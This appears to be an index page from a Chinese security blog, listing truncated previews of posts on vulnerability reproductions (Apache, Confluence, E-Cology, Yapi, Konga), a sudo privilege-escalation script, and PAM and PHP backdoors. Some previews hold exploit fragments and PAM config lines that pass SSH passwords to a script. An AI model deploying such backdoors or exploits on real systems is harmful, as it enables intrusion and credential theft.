Centos7 sudo 提权脚本

#!/usr/bin/python import os import sys import resource from struct import pack from ctypes import cdll, c_char_p, POINTER SUDO_PATH = b"/usr/bin/sudo" PASSWD_PATH = '/etc/passwd' # pa...

Apache CVE-2021-41773 复现

一、 CVE-2021-41773 先决条件 1.Apache 2.4.49 版本 2.穿越目录运行被访问。比如配置了<Directory />Require all granted</Directory> ...

泛微E-Cology WorkflowServiceXml RCE 复现

之前的老洞。复现了一下下 POST /services%20/WorkflowServiceXml HTTP/1.1 Accept-Encoding: gzip, deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Leng...

密码保护:Confluence RCE CVE-2021-26084 复现

安装 Confluence  wget https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.9.1-x64.bin chmod +x atlassian-confluence-6.9.1-x64.bin ...

PAM 后门记录用户名和密码

在/etc/pam.d/sshd 中添加如下的数据 auth [default=ignore] pam_exec.so expose_authtok quiet /etc/security/suicide.sh password [default=ignore] pam_exec.so expose_authtok quiet /etc/secu...

PAM_Python实现SSH 因子认证 Python3 版本

Pam_Python 暂时只能完美的适配Python2的版本。在Python3版本下。安装成了问题。 环境:Centos8.3 Python版本:Python3.6  需要安装PAM 的开发环境 yum instal...

Konga 任意用户登录 分析

首先是Docker 启动Konga  docker run -p 1334:1337 --name konga2 pantsel/konga 然后注册一个管理员登录进去 会返回一个token。然后利用这个token 是可...

Yapi远程命令执行漏洞复现

前面环境搭建。遇到了一些坑。最终换到Docker  最终还是Docker 真香 docker pull registry.cn-hangzhou.aliyuncs.com/anoy/yapi mkdir -p /home/data/yapi/mongodata docker run -...

PHP扩展学习–简单的后门编写

通过上一篇文章已经简单的理解了PHP 扩展的一个流程。如果还没有理解请看如下的文章 具体的参考如下: https://blog.csdn.net/u011957758/article/details/72719666 https://blog.csdn.net...